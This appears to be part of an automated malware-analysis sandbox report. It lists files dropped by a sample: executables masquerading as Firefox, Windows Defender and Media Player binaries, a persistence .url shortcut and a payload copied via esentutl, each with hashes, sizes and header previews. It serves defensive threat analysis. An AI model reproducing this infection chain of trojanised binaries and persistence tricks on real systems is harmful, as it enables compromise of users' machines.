                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:4B797C3115B6DBECBFD3368BB173397E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4A4C1CB8C302FE0ECD7813FA0B46701C899C4784
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E5425EF2AABE06E44173A6C620CD85DA71C5C65667518F3975EEB09855808F86
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4DCE46E7D0CFBA4B52B67BDEEC95E71476655319E120DACC40D9321D45746FD8C1B20D4E1EFBD7F635D52D92942A885E236A35A2FBAE7513673F3B014D8A4B7C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@....................................-..... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1378304
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.377454924480701
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:BQUVPDHhS1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:SyhS1sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2CF1493B30BDCF31B70EE5A73007D7F4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8CFA989D43FF0DB3AE164666F7590B42CAF8A2E4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:38979F0B8283837D007FA538FFEDA7178AFA25431D7785A2FF06771556CD9FF0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0770C33A00C1DD4691BE5D59386AE69F7AA8F6DE9EFD3D08BF38FD4ACE5CCED0E6E922DE8BF6B910D4F3FEC7C139E48EF401B904619B1ECE23854F02B4786186
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p.......'.... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.222152768885546
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:TsFfc1VyFn5UQn652bO4HysqjnhMgeiCl7G0nehbGZpbD:TsFcIn5rJEDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2C5F4F2A25097F8A5DAFB95621A693BF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6D0159E028901844D352A57152D03F5479047036
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8335FB2010646D3E4B64DB88A8C97BF9DB0F5855C6214A9852DD6681724F6128
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:136C4462E8B81A67F45D42CEB0AE31C39AD934BAADF88AF25D1BCE8E0372CC30AC70F14D5A6EEE4CE1E99DE5C7E9A4403F5B01F974A9B9BE321A6B546D222A0F
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................gz.... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.494303965583851
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3t9o6p4xQbiKI69wpemIwpel9JsqjnhMgeiCl7G0nehbGZpbD:3t9faQbtl2peapelzDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:28E631F22FD8D2FA65C50FFB7FF847AC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:58ECC1F824B2C6F5B6F7BE37A43768DB2A4432A4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B959C15F710F35FB3CA5FDC6ECDFD2BE560D48B6D216628D9CA44F9C36BB502E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4896243FCBA21C1F81C67CBB77AFD5EF119B230D03B1E0249C9C484D100B8B14C8701879D179D43375F93A43FC2C37552FE73965FB27087E08D141106B20C656
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.....................................d.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.347865273237282
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:zQVTZu0JasqjnhMgeiCl7G0nehbGZpbD:EVTZuDDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2975735D5E5F40BF64CC32F66129A29A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5F9CC64A9760FA7F8392A46B28EEE8F3CDB863F2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B4ECDC581248C9CB8923AB1ACB6F90E7A333BD3D761A2B415FEE27E185A4AB0E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C039AEC313F95028CD3D1F0CFF0EF40930C87545C4A43F7F4F3E122FBAFADDEB536B8413E85F556648149293CA23D6E843A2C8BA02724D52335F0AE5AAEE8E67
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P......o..... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.808413100760558
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:+C1vpgXcZHzosqjnhMgeiCl7G0nehbGZpbD:+C1vpIcNUDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1BBA2B6E65F0F0164EF9008FB8858696
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:ADAF510973CE3E6B8CF1037BB83F10823825EA02
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4886B0992536D1A7440B88C3753811AE613CC40553FA1325A16FAA15646812F2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:21734CFC62C10CB9C8D2C55B972764397B5F18076164C3CC137CB3B867FA4845C1D6059B78152F811E3649863190A06B3419B8232B5572E8A696953E02C8A6E9
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.....................................}.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.1400449421397605
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:5Swj8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5v8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:BEF6B548B9DA6664112D53E383D0C3B8
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7FF539D1D907AAA7D6CAD3458CD98718EDFD41A1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:60AF2262B1AE6A5774E237FFBF46A740621AD94E2866E0D3210D062BE6B029E9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:245037685B5D5D2B6B86B16B2A7853B6A5C3E93726522375378E69836AD8EE6F65C3DFEF9F7D14ACAC56814F4C4CFF36BE2AC4898C4519FF2C521D7D7EF382D9
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1408512
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.441178947969114
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:MWKntIfGpKsqjnhMgeiCl7G0nehbGZpbD:H8IecDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:CEB087107726202FB96EC71CB756FF85
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0495B2422475A405BCB9AB85B36A8EDA0B21DE01
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:63344074516A8B6AF0D5A0DDC019797CF67DC5336CF05F3CA529750A0EDE7351
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1A3FD09199E16C049ACA5AD3B2F123410536797D8C427ED63C4D8FD2A7E9B75E54D96EC311792DA75762AD9E4F1F9BE883116315D4861A9EB0FCF006B218079B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.......................................... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1185280
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.103299831936472
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:3IhAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2AsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:32C02AD4F66647D12028B9D13A0F9AF6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EEBBAB7B65F33C2CCE65EACBC4ECFD48A8B63826
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:46953330D2A49F290321136AEC1FBA754CBA5BAE1FFF3E666AA48F2AA186E43F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CF7C37DEDBD0DB02A9C31D0464DB783D854A425F886804E8CDD59A0BB871A9AE6A30348C4968ABEDB51D4B961F43238FBF2EF9C0F9436C95CA7FFA292A4375EB
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1531904
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.421232634930076
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:R8oREwt2ioQ3J+R5sqjnhMgeiCl7G0nehbGZpbD:R8oRpoF9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:898797D02842ED96FC876B7D9A437B8A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:27E195ACD9361F5A5D5799757E26B19DE4E8CFAD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4254670DC1E092CE5E3C7D2B3F5430D34482AA0B950F8A5884E17A7C135AC049
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CA4781CA69EFD296D61BFE529350B207E5E3A98E7E787DF6F670BD6BDAE7342F40EEC2347E7C316A5E090ED684A9D56F6CD59F58256A17691BD7C041DBAFD275
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.......................................... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1341952
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2386285259395775
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:Pf8HQlDMxHwJ07w5sqjnhMgeiCl7G0nehbGZpbD:PkHQlqwJ0ODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:30F616E4733CD24C5B4B4A7A2E46F3F5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:74C54E472791ED67832BEC966F09F8D94FE9DD6F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:181B0C4B86CAC239F65757FDEF96168004CD266B044A69FF227D2BC57F384CC0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1E44AE439FC68941A086CB0D567EA79221F19A14BE4603BA73CD2B965D1FD927F7AFB34F502B4E434EDB761296AFD3D5C1B7A398CD79DE6F983A2597F2B01B7F
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.......................................... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Windows Media Player\wmpnetwk.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1534464
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.124658928502783
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:nSEmYD6gjGPG45QVDkfXplyTy6sqjnhMgeiCl7G0nehbGZpbD:n5mYD6g2GWQVQf3yTZDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:21293BC4BDB1D525FF7A2EB2FF5BCC4B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:55491405FCA66E1758F18D0EE78BD740E923DD54
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:626C0FFDF1CCD82797D2DE08CE7869C6BA3A1AC773FB33501609D6B5A49497BF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:19A50181BDABD157DBB45A58B733060F56207631CF1268191F21A691A2650CCDAFF6FE1DF535C27ACF870EF79EC60B54C7CDD1F1450BE10EE54B2E18EAEC0AA7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.......................................... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Public\Jwsmvmdw.url

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):104
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.208752911316408
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMuPE4vsbxG49hn:HRYFVmTWDyzFExGohn
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:B5DCD4C34EB13B9D2C1D6C7AE971BA83
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E62CF8627F393D396C3FE7FEC77953DD8FE51C49
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:89D1889D3D0A09731002BC34D4B05BF017B84E87B4996779938B61E2FCD69C9F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:93C05355B2BF5AB421EFF63078CAEF8446831BBB9F1BDD2EE94C778CBCC60BB339372644616CE932406AC20557122CE620B3361A7B62E4CE7B3A81742E13ABD3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF"..IconIndex=942729..HotKey=56..

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Public\Libraries\Jwsmvmdw

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1636152
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.185832775275259
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:TLWgMFTOfQ4EGMp0nwrLWwv8Lgv5Q2GAXmpuX/LLlmynFNnSyRKHxNnrpEGOFz9H:HJMFTyVMp0wrLO45ZXmAViySIFBe+Z
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:3A5144C37240C98813B33D0350D0FF66
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:013D7DFCCAA9351301BA00A4C1426FD7217B5FCE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DD4C1B61E889891C10AA15DBFB1279FFBD0E6423E427CDD0F55DD6E5D1937ED5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E128EFE59A92C267143554EE47331E017988997635A1ECF6E806F91A52C869C0730C4285D3227DAD66E25BB189C8244D2F789E7E8A66720EE56548EE0644735C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:...Y#..K....."......#.$..'....#.$..&! ..............!...$........'...&#....%.. ....Y#..KU$ .#..$.&....Y#..K.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................?........&..#...Q..............|...G..^..Y4..(..hM..rX..p.........D.f%i.....

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Public\Libraries\Jwsmvmdw.PIF

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1051648
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.894752592142907
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ZVb5KPAdOzVmG3zd+EIDT8Jf3pbV13Jks:ZVhOhd+EI8t5X
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:943266BC468E334D168F1F43831E8B7D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F6D83CAF22A573E96F82D589F9C7C33D15D8D73B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:ED7C088C9E9F1F53F2627D68DEC62F0712062B382F307E032140D3715F2BB7C6
